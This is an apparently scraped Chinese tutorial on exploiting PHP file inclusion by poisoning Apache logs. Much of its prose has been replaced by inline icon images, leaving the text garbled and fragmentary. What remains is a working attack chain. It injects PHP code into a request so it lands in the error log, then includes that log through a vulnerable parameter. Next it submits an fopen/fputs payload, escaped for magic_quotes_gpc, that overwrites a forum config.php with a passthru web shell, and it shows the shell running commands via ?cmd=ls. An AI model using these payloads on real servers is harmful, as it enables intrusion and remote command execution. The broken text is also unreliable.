有关php包含Apache日志
![](/icons/64725de.gif)
![](/icons/64725de.gif)
![](/icons/64725dou.gif)
![](/icons/64725de.gif)
![](/icons/64725dou.gif)
![](/icons/64725dou2.gif)
![](/icons/64725dou.gif)
![](/icons/64725de.gif)
![](/icons/64725dou.gif)
![](/icons/64725de.gif)
![](/icons/64725de.gif)
![](/icons/64725dou.gif)
![](/icons/64725de.gif)
![](/icons/64725dou2.gif)
![](/icons/64725yi.gif)
![](/icons/64725dou2.gif)
比如说
![](/icons/64725dou.gif)
![](/icons/64725yi.gif)
![](/icons/64725yi.gif)
![](/icons/64725de.gif)
<?
![](/icons/64725include.gif)
你可以
而数据日志/home/virtual/www.xxx.com/logs/www-access_log也是
![](/icons/64725yi.gif)
![](/icons/64725de.gif)
![](/icons/64725dou.gif)
![](/icons/64725yi.gif)
![](/icons/64725dou.gif)
![](/icons/64725dou.gif)
![](/icons/64725dou.gif)
![](/icons/64725dou2.gif)
比如我们提交
http://www.xxx.com/<?phpinfo
![](/icons/64725kh.gif)
这样肯定会出错
![](/icons/64725dou.gif)
http://xxx.com/z.php?zizzy=/home/virtual/www.xxx.com/logs/www-error_log
这样这个日志文件就被包含成了phpinfo
![](/icons/64725de.gif)
可以
![](/icons/64725de.gif)
![](/icons/64725dou.gif)
发散思维:
下面想
![](/icons/64725de.gif)
![](/icons/64725yi.gif)
![](/icons/64725yi.gif)
![](/icons/64725dou2.gif)
当然前提是权限必须可写
![](/icons/64725dou.gif)
![](/icons/64725yi.gif)
![](/icons/64725dou.gif)
![](/icons/64725de.gif)
![](/icons/64725dou2.gif)
比如这句php语句
<?=str_replace("?","!",passthru($cmd));?>
到这里你也许就想到了
![](/icons/64725dou.gif)
![](/icons/64725de.gif)
![](/icons/64725dou2.gif)
![](/icons/64725dou.gif)
![](/icons/64725dou.gif)
fopen打开/home/virtual/www.xxx.com/forum/config.php这个文件
![](/icons/64725dou.gif)
![](/icons/64725de.gif)
![](/icons/64725dou2.gif)
<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?=str_replace("?","!",passthru($cmd));?>");fclose($fp);?>
我们提交这句
![](/icons/64725dou.gif)
");fclose($fp'>http://xxx.com/z.php?zizzy=<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?=str_replace(\"?\",\"!\",passthru(\$cmd));?>");fclose($fp);?>
语句里加了些斜杆也是为了magic_quotes_gpc考虑
![](/icons/64725dou.gif)
![](/icons/64725yi.gif)
![](/icons/64725dou2.gif)
再来提交
http://xxx.com/z.php?zizzy=/home/virtual/www.xxx.com/logs/www-error_log
这样webshell就写入成功了
![](/icons/64725dou2.gif)
OK.
http://www.xxx.com/forum/config.php这个就成了我们
![](/icons/64725de.gif)
你可以http://www.xxx.com/forum/config.php?cmd=ls来使用了
最新评论